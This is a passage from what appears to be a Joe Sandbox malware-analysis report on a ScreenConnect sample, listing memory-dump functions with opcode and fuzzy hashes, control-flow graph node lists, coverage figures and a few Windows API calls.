                                                                                    • Opcode ID: a5cd64bb69f766c66ea07a68784b04f888f11e75a7090a6fa6dd354ac541094f
                                                                                    • Instruction ID: 04ce9d09061bd5a0fd56c6ea8d6f3edc1b15fb92123238b5c51162597e302ba1
                                                                                    • Opcode Fuzzy Hash: a5cd64bb69f766c66ea07a68784b04f888f11e75a7090a6fa6dd354ac541094f
                                                                                    • Instruction Fuzzy Hash: C7A14A31D1025A8FCF15DFA9C4805DDFBB1FF89314F25866AD405BB245EB34AA86CB90
                                                                                    Function 017B4D30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlGetVersion.NTDLL(0000009C), ref: 017B4DBE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3519752168.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_17b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID: `Qtq$s4h$s4h
                                                                                    • API String ID: 1889659487-2749137109
                                                                                    • Opcode ID: ebeea718c034a4e69f70985604bc730ffa60821ea3510cb9ef6dd09d3341dbb8
                                                                                    • Instruction ID: 47689948cb2d13d2576a45b0b70dc6a93f0904184201f5cba7c7740e32866e98
                                                                                    • Opcode Fuzzy Hash: ebeea718c034a4e69f70985604bc730ffa60821ea3510cb9ef6dd09d3341dbb8
                                                                                    • Instruction Fuzzy Hash: 25211275A05268DFEF60CF59C844B99FBB9FB08310F0082D9D50DA7290CB756A98CF92

                                                                                    Execution Graph

                                                                                    Execution Coverage:12.5%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:5
                                                                                    Total number of Limit Nodes:1
                                                                                    execution_graph 14915 7ffd9b628014 14917 7ffd9b62801d 14915->14917 14916 7ffd9b628082 14917->14916 14918 7ffd9b6280f6 SetProcessMitigationPolicy 14917->14918 14919 7ffd9b628152 14918->14919

                                                                                    Executed Functions

                                                                                    Function 00007FFD9B936E7A Relevance: .8, Instructions: 772COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1119 7ffd9b936e7a-7ffd9b936eb5 1126 7ffd9b936eb6-7ffd9b936edc 1119->1126 1130 7ffd9b936ede-7ffd9b936f21 1126->1130 1135 7ffd9b936f26-7ffd9b936f4c 1130->1135 1139 7ffd9b936f4e-7ffd9b936fcc 1135->1139 1146 7ffd9b936fce-7ffd9b936fea 1139->1146 1147 7ffd9b937016-7ffd9b937026 1139->1147 1148 7ffd9b936ff0-7ffd9b93700e call 7ffd9b930d60 * 2 1146->1148 1149 7ffd9b9373f8-7ffd9b937416 call 7ffd9b930d60 * 2 1146->1149 1153 7ffd9b937028-7ffd9b93702a 1147->1153 1154 7ffd9b93702c-7ffd9b93703a call 7ffd9b930120 1147->1154 1167 7ffd9b93728e-7ffd9b9372ac call 7ffd9b930d60 * 2 1148->1167 1168 7ffd9b937014-7ffd9b937015 1148->1168 1165 7ffd9b937522-7ffd9b93752d 1149->1165 1166 7ffd9b93741c-7ffd9b937423 1149->1166 1157 7ffd9b93703d-7ffd9b937052 1153->1157 1154->1157 1170 7ffd9b937054-7ffd9b937056 1157->1170 1171 7ffd9b937058-7ffd9b93707c call 7ffd9b936c40 * 2 1157->1171 1172 7ffd9b937425-7ffd9b937434 1166->1172 1173 7ffd9b937436-7ffd9b937438 1166->1173 1190 7ffd9b9372ae-7ffd9b9372b8 1167->1190 1191 7ffd9b9372d6-7ffd9b9372f4 call 7ffd9b930d60 * 2 1167->1191 1168->1147 1175 7ffd9b93707f-7ffd9b937094 1170->1175 1171->1175 1172->1173 1185 7ffd9b93743a 1172->1185 1177 7ffd9b93743f-7ffd9b937463 1173->1177 1186 7ffd9b937096-7ffd9b937098 1175->1186 1187 7ffd9b93709a-7ffd9b9370be call 7ffd9b936c40 * 2 1175->1187 1188 7ffd9b9374af-7ffd9b9374c5 1177->1188 1189 7ffd9b937465-7ffd9b937482 1177->1189 1185->1177 1194 7ffd9b9370c1-7ffd9b9370d6 1186->1194 1187->1194 1201 7ffd9b93752e-7ffd9b9375a7 1189->1201 1202 7ffd9b937488-7ffd9b9374ad 1189->1202 1197 7ffd9b9372cc 1190->1197 1198 7ffd9b9372ba-7ffd9b9372ca 1190->1198 1215 7ffd9b9373ab-7ffd9b9373b6 1191->1215 1216 7ffd9b9372fa-7ffd9b937305 1191->1216 1212 7ffd9b9370d8-7ffd9b9370da 1194->1212 1213 7ffd9b9370dc-7ffd9b9370f4 call 7ffd9b936c40 1194->1213 1204 7ffd9b9372ce-7ffd9b9372cf 1197->1204 1198->1204 1223 7ffd9b9375f0-7ffd9b937646 1201->1223 1224 7ffd9b9375a9-7ffd9b9375ed 1201->1224 1202->1188 1204->1191 1218 7ffd9b937103-7ffd9b937111 1212->1218 1213->1218 1233 7ffd9b9373b8-7ffd9b9373ba 1215->1233 1234 7ffd9b9373bc-7ffd9b9373cb call 7ffd9b930120 1215->1234 1229 7ffd9b937307-7ffd9b937309 1216->1229 1230 7ffd9b93730b-7ffd9b93731a call 7ffd9b930120 1216->1230 1231 7ffd9b937113-7ffd9b937115 1218->1231 1232 7ffd9b937117-7ffd9b937125 call 7ffd9b930120 1218->1232 1254 7ffd9b937648-7ffd9b937649 1223->1254 1255 7ffd9b93764c-7ffd9b937670 1223->1255 1224->1223 1237 7ffd9b93731d-7ffd9b937358 1229->1237 1230->1237 1239 7ffd9b937128-7ffd9b93713f 1231->1239 1232->1239 1241 7ffd9b9373ce-7ffd9b9373d0 1233->1241 1234->1241 1251 7ffd9b93735b-7ffd9b937361 1237->1251 1239->1167 1265 7ffd9b937145-7ffd9b93714c 1239->1265 1241->1165 1243 7ffd9b9373d6-7ffd9b9373e8 1241->1243 1243->1149 1257 7ffd9b937363-7ffd9b93736b 1251->1257 1258 7ffd9b937374-7ffd9b93737c 1251->1258 1254->1255 1274 7ffd9b9376a2-7ffd9b9376ab 1255->1274 1275 7ffd9b937672-7ffd9b937681 1255->1275 1260 7ffd9b93737d-7ffd9b93737e 1257->1260 1263 7ffd9b93736d-7ffd9b937372 1257->1263 1258->1260 1261 7ffd9b93738e-7ffd9b9373a9 1258->1261 1264 7ffd9b937383-7ffd9b93738d call 7ffd9b936c78 1260->1264 1261->1215 1261->1251 1263->1264 1264->1261 1265->1167 1268 7ffd9b937152-7ffd9b937169 1265->1268 1280 7ffd9b93719e-7ffd9b9371a9 1268->1280 1281 7ffd9b93716b-7ffd9b93717d 1268->1281 1278 7ffd9b937683-7ffd9b937684 1275->1278 1279 7ffd9b937687-7ffd9b9376a1 1275->1279 1278->1279 1288 7ffd9b9371af-7ffd9b9371be call 7ffd9b930120 1280->1288 1289 7ffd9b9371ab-7ffd9b9371ad 1280->1289 1285 7ffd9b93717f-7ffd9b937181 1281->1285 1286 7ffd9b937183-7ffd9b937191 call 7ffd9b930120 1281->1286 1291 7ffd9b937194-7ffd9b937197 1285->1291 1286->1291 1293 7ffd9b9371c1-7ffd9b9371c3 1288->1293 1289->1293 1291->1280 1294 7ffd9b937278-7ffd9b93728a 1293->1294 1295 7ffd9b9371c9-7ffd9b9371e0 1293->1295 1294->1167 1295->1294 1300 7ffd9b9371e6-7ffd9b937203 1295->1300 1303 7ffd9b93720f 1300->1303 1304 7ffd9b937205-7ffd9b93720d 1300->1304 1305 7ffd9b937211-7ffd9b937213 1303->1305 1304->1305 1305->1294 1307 7ffd9b937215-7ffd9b93721f 1305->1307 1308 7ffd9b93722d-7ffd9b937235 1307->1308 1309 7ffd9b937221-7ffd9b93722b call 7ffd9b9318c0 1307->1309 1310 7ffd9b937263-7ffd9b937276 call 7ffd9b936c68 1308->1310 1311 7ffd9b937237-7ffd9b937242 1308->1311 1309->1167 1309->1308 1310->1167 1311->1310
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f0ec053c08c6bf535fcf533e66da04c200ce964c024aafb8bd92517d4630eb22
                                                                                    • Instruction ID: ace2eafa3990a1f2cce26e428af9fcdba3bae42c0762d08caf2a4e39f035173d
                                                                                    • Opcode Fuzzy Hash: f0ec053c08c6bf535fcf533e66da04c200ce964c024aafb8bd92517d4630eb22
                                                                                    • Instruction Fuzzy Hash: C0323832B2EA4E5FE7B997A88474AB967D2EF84340F16407AD05DC71E2ED18B9068341
                                                                                    Function 00007FFD9B935D61 Relevance: .5, Instructions: 512COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 869ea5b332244830235ff156d783c6de1bfb0be7c686d5b814f76a3ba9967c73
                                                                                    • Instruction ID: 25911d1f15eb176aebc1fd303b45e94f6f6a31157b631fa7b99e5651e1468faf
                                                                                    • Opcode Fuzzy Hash: 869ea5b332244830235ff156d783c6de1bfb0be7c686d5b814f76a3ba9967c73
                                                                                    • Instruction Fuzzy Hash: BAF14932F2EA4E5BEB7D9AA884756B437D2EF94340F1641B9D85DC71E7DD28BC028240
                                                                                    Function 00007FFD9B628014 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3546536860.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b620000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: MitigationPolicyProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1088084561-0
                                                                                    • Opcode ID: d30cd6d0d53a4d3b9d3c513b1db45f92525174ea349eb43311df59a9cc69854b
                                                                                    • Instruction ID: 3d0acdb380d7d99b16cd89f53181424703ecfb564e1dfbde244459122537e698
                                                                                    • Opcode Fuzzy Hash: d30cd6d0d53a4d3b9d3c513b1db45f92525174ea349eb43311df59a9cc69854b
                                                                                    • Instruction Fuzzy Hash: C5514631D0CB494FEB28AFA89C4A5E97BE0EF55310F04017EE099C7192DF68B9468B91
                                                                                    Function 00007FFD9B9320AE Relevance: .7, Instructions: 731COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1318 7ffd9b9320ae-7ffd9b9320b7 1319 7ffd9b93217d-7ffd9b932194 1318->1319 1320 7ffd9b9320bd-7ffd9b9320e6 1318->1320 1324 7ffd9b93219b-7ffd9b9321bf 1319->1324 1327 7ffd9b93212e 1320->1327 1328 7ffd9b9320e8-7ffd9b93212c call 7ffd9b9313f8 1320->1328 1332 7ffd9b9321c1-7ffd9b932200 1324->1332 1333 7ffd9b932205-7ffd9b932247 1324->1333 1331 7ffd9b932130-7ffd9b93216f 1327->1331 1328->1331 1350 7ffd9b932872-7ffd9b932887 1332->1350 1351 7ffd9b93228d-7ffd9b93229b 1333->1351 1352 7ffd9b932249-7ffd9b93227f 1333->1352 1356 7ffd9b93229d-7ffd9b9322a2 1351->1356 1357 7ffd9b9322b6-7ffd9b9322ba 1351->1357 1358 7ffd9b9322bf-7ffd9b9322d4 1356->1358 1359 7ffd9b9322a4-7ffd9b9322b2 1356->1359 1357->1350 1364 7ffd9b9322d6-7ffd9b932316 1358->1364 1365 7ffd9b93231b-7ffd9b932330 1358->1365 1359->1357 1364->1350 1368 7ffd9b932381-7ffd9b932399 1365->1368 1369 7ffd9b932332-7ffd9b932336 1365->1369 1374 7ffd9b93242f-7ffd9b932447 1368->1374 1375 7ffd9b93239f-7ffd9b93242a 1368->1375 1369->1350 1370 7ffd9b93233c-7ffd9b93237c 1369->1370 1370->1350 1380 7ffd9b93249d-7ffd9b9324df 1374->1380 1381 7ffd9b932449-7ffd9b932498 1374->1381 1375->1350 1395 7ffd9b9325ad-7ffd9b9325c2 1380->1395 1396 7ffd9b9324e5-7ffd9b9324fb 1380->1396 1381->1350 1402 7ffd9b9325c4-7ffd9b9325d2 1395->1402 1403 7ffd9b93263a-7ffd9b93264f 1395->1403 1398 7ffd9b9324fd-7ffd9b93251a 1396->1398 1399 7ffd9b932549-7ffd9b932561 1396->1399 1409 7ffd9b933b0f-7ffd9b933b3e 1398->1409 1410 7ffd9b932520-7ffd9b932547 1398->1410 1399->1350 1405 7ffd9b932567-7ffd9b932592 1399->1405 1407 7ffd9b9325d4-7ffd9b932616 1402->1407 1408 7ffd9b932618-7ffd9b932635 1402->1408 1412 7ffd9b9326e7-7ffd9b932718 1403->1412 1413 7ffd9b932655-7ffd9b932696 1403->1413 1405->1395 1407->1408 1408->1350 1449 7ffd9b933b3f 1409->1449 1410->1399 1421 7ffd9b932764-7ffd9b932772 1412->1421 1422 7ffd9b93271a-7ffd9b932725 1412->1422 1437 7ffd9b9326dd-7ffd9b9326e2 1413->1437 1438 7ffd9b932698-7ffd9b9326d8 1413->1438 1421->1350 1422->1421 1437->1350 1438->1350 1449->1449
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 03aac55f38485bb1e43999983906ea606532b07cfd259991df0aebea1f20ac59
                                                                                    • Instruction ID: 6329a089a5417a76d6ce8593d100bda1e4bdb2668efd3a8c8e468f1b7ff5a52f
                                                                                    • Opcode Fuzzy Hash: 03aac55f38485bb1e43999983906ea606532b07cfd259991df0aebea1f20ac59
                                                                                    • Instruction Fuzzy Hash: 81223B72B2AE4E1FEBA8DBA884A56B533D2FFA4380B054179D41DC71A6DD24FD068740
                                                                                    Function 00007FFD9B93069D Relevance: .5, Instructions: 479COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 285224ccf3c91c513666ec0e30539b5849073b14cad77be6432262bdf4eb5717
                                                                                    • Instruction ID: f5ed82ba10235055ed33d591461c14f1e1cf3cc9447d42495d1da075571d9fea
                                                                                    • Opcode Fuzzy Hash: 285224ccf3c91c513666ec0e30539b5849073b14cad77be6432262bdf4eb5717
                                                                                    • Instruction Fuzzy Hash: 9EE12730B2EB4E5FEBA9EBA884617B937D1EF58700F0540B9D48DCB1A7DD28E9418740
                                                                                    Function 00007FFD9B934E95 Relevance: .4, Instructions: 386COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf56881611cd3ceb0ea85870d4137ea6a2c733e18808b8f5bd4d0159a7b28cc0
                                                                                    • Instruction ID: 1e12a9c3c7957fa59c455668dd0ebf734033a5586f2466a235c63638daa76dc4
                                                                                    • Opcode Fuzzy Hash: bf56881611cd3ceb0ea85870d4137ea6a2c733e18808b8f5bd4d0159a7b28cc0
                                                                                    • Instruction Fuzzy Hash: 6EB18B32B1EE4E2FDF68EA6888618B537D1EF54340B05417DD84D8B1E7ED15FA0A8781
                                                                                    Function 00007FFD9B932E72 Relevance: .3, Instructions: 335COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 465e92f120d5ff200b6bbabe3a66e2161840e8fdccd1352216cb9a7d5c4514df
                                                                                    • Instruction ID: 2c6afc109fa4d67babbc48bdb5ec7c0a66464c71f81f9309517219239c72a5bf
                                                                                    • Opcode Fuzzy Hash: 465e92f120d5ff200b6bbabe3a66e2161840e8fdccd1352216cb9a7d5c4514df
                                                                                    • Instruction Fuzzy Hash: 3DA15A62B2EF8F5BE7A8DAAC44616B533D2FFA4740705417AC45EC71E6DD24F9068340
                                                                                    Function 00007FFD9B9318E0 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b24f90cdd26d0ef09caa5108aa9ff6ce861ca83c49d8e63e8e77279314488e1
                                                                                    • Instruction ID: e4dd2edb82dc0c738e79121623751309c8473c6982f9e248a4d0c9996cfa163b
                                                                                    • Opcode Fuzzy Hash: 1b24f90cdd26d0ef09caa5108aa9ff6ce861ca83c49d8e63e8e77279314488e1
                                                                                    • Instruction Fuzzy Hash: 9A717A7272DB1E5BEB789A9DA49D27573C1EB99360B01013ED48BC32A2ED26FC434741
                                                                                    Function 00007FFD9B9381BB Relevance: .3, Instructions: 293COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 097ef62481bc9016ab566f04c1dd258e668e11d0634a71c835e287d7a7cf894d
                                                                                    • Instruction ID: b722c061d3d6a34eeb5955aba33e0323f7b67ea1255072d0a43161f10419cd20
                                                                                    • Opcode Fuzzy Hash: 097ef62481bc9016ab566f04c1dd258e668e11d0634a71c835e287d7a7cf894d
                                                                                    • Instruction Fuzzy Hash: 9A817861B2EF8E1FEBA99B6844B55B07BE1FF55300B1501BAD058C71E7ED18B9068341
                                                                                    Function 00007FFD9B934FB2 Relevance: .3, Instructions: 261COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 042d472427b0bd2f8ce4bc771e41e7638a4aeda33671038907ffb98c3aa127e5
                                                                                    • Instruction ID: 21954ae0f0292d1a625ccff30e17f4d667f2e36def86adec00e9c157a63cf86a
                                                                                    • Opcode Fuzzy Hash: 042d472427b0bd2f8ce4bc771e41e7638a4aeda33671038907ffb98c3aa127e5
                                                                                    • Instruction Fuzzy Hash: 37812C32B1DE0E6BDB68EA54C4628B533D1FF68340B504539D84E8B5E6EE25FA0687C1
                                                                                    Function 00007FFD9B930766 Relevance: .2, Instructions: 243COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b235e14b623313a8efed2f4097ba078ead85e7bae3203b35f126b58b43032e8
                                                                                    • Instruction ID: 58259e8018a3c39899a86a9cab6c74f852ae00aaa008aa244ea937a21e320354
                                                                                    • Opcode Fuzzy Hash: 5b235e14b623313a8efed2f4097ba078ead85e7bae3203b35f126b58b43032e8
                                                                                    • Instruction Fuzzy Hash: 2481677072DA4E9FEBB9EBA8C4617A937D1FF59700F1240B8D44ECB1A2DD69E9018740
                                                                                    Function 00007FFD9B9302FA Relevance: .2, Instructions: 225COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 615ee5dbaed1d4639f4ed72b1abcb8aefdd23c512511d3ca8913baa72b302123
                                                                                    • Instruction ID: 19cbb9301803f3000e0b7a48f7befaa03e8732541710b5dfcb3f82d38b5cab76
                                                                                    • Opcode Fuzzy Hash: 615ee5dbaed1d4639f4ed72b1abcb8aefdd23c512511d3ca8913baa72b302123
                                                                                    • Instruction Fuzzy Hash: B8710B63E1F7D95FE76697AC58755E93BA0AF22610B0E00FBC0C88B0E3ED15A9458345
                                                                                    Function 00007FFD9B935F74 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 43d1ca4e4bdfed28c394f4cb18c51e70a9cad83cb13c09770b2038adfbeb708c
                                                                                    • Instruction ID: db3e02dbcb0e57c27ef6bf6f1ef9714059ca9c8a5d0b49b3cd12dc0970ac17fa
                                                                                    • Opcode Fuzzy Hash: 43d1ca4e4bdfed28c394f4cb18c51e70a9cad83cb13c09770b2038adfbeb708c
                                                                                    • Instruction Fuzzy Hash: F2610721B2EB4B5FFB7D9BA884B16B43791EF56304F1601B9D45DCA1E7CD1CB8068241
                                                                                    Function 00007FFD9B932C9E Relevance: .2, Instructions: 182COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d3c16448efdef90d35d4d9a9ac3b53bbb4a7514dc04fd683b5849e12f230fc63
                                                                                    • Instruction ID: 5fc7dd4f8899db85940c3a7deb7a017f78d1920f7bd08b6af41b9555f131b0e4
                                                                                    • Opcode Fuzzy Hash: d3c16448efdef90d35d4d9a9ac3b53bbb4a7514dc04fd683b5849e12f230fc63
                                                                                    • Instruction Fuzzy Hash: AE51D47271EA494FEB98DF58C461AA533D2FFA4350B0501B9D45DCB2A6DE31F806CB80
                                                                                    Function 00007FFD9B938558 Relevance: .2, Instructions: 169COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b839dc61486c0d0351d871e14a85de1cea7a1d26b83d5be943f5e7ba13cfc441
                                                                                    • Instruction ID: 58205cb2aae95125d14c2653897c8abecb575c489a02d6fc8947aaadc12dd448
                                                                                    • Opcode Fuzzy Hash: b839dc61486c0d0351d871e14a85de1cea7a1d26b83d5be943f5e7ba13cfc441
                                                                                    • Instruction Fuzzy Hash: F6514C32B1FE4D9BEB659A9898B40E877E1FF98344F0501BAD45DC31B2EF256946C340
                                                                                    Function 00007FFD9B9340BF Relevance: .1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3966772fc353c884eebc703097987387e6e7846589e445899af7739ae550674b
                                                                                    • Instruction ID: 344faec43dcd15c5d2be91a190ce218085fca8ad4a8cc1c31e1194d7b805018b
                                                                                    • Opcode Fuzzy Hash: 3966772fc353c884eebc703097987387e6e7846589e445899af7739ae550674b
                                                                                    • Instruction Fuzzy Hash: 1A414534719A0A8FDEDCEF58C09176573A2FF98304B654968C069DB69AC635E943C780
                                                                                    Function 00007FFD9B9314F2 Relevance: .1, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df380a329617b6b99966437fbf9184defaa94d40c9aa47a4bd152fea513f8493
                                                                                    • Instruction ID: ff26813d6ff61025a259d275a5dce6410f0648648e6ce3b27969b6a9daba7a3e
                                                                                    • Opcode Fuzzy Hash: df380a329617b6b99966437fbf9184defaa94d40c9aa47a4bd152fea513f8493
                                                                                    • Instruction Fuzzy Hash: 4931273290F3A62BD755A778A8714D537A0DF0262870906B7D0DE8E0B7EE15158B8784
                                                                                    Function 00007FFD9B9314CF Relevance: .1, Instructions: 100COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a36153cb0f1baa1fba9485714e7bb8c6853a012ef011f19cc53bdb9be8606de6
                                                                                    • Instruction ID: 39c46fe4615ecd981d836d17466cca1c71a144be72438367187baf97cdb1b81c
                                                                                    • Opcode Fuzzy Hash: a36153cb0f1baa1fba9485714e7bb8c6853a012ef011f19cc53bdb9be8606de6
                                                                                    • Instruction Fuzzy Hash: 70212B3290F3AA6FD755A77CA4754D537A0EF0262870906B7C0DE8F0B7EE1515478740
                                                                                    Function 00007FFD9B9370F7 Relevance: .1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 44eb3171c9ab6aa8816482611ccfac05d07789e543dfd6b995d82a8c6981f087
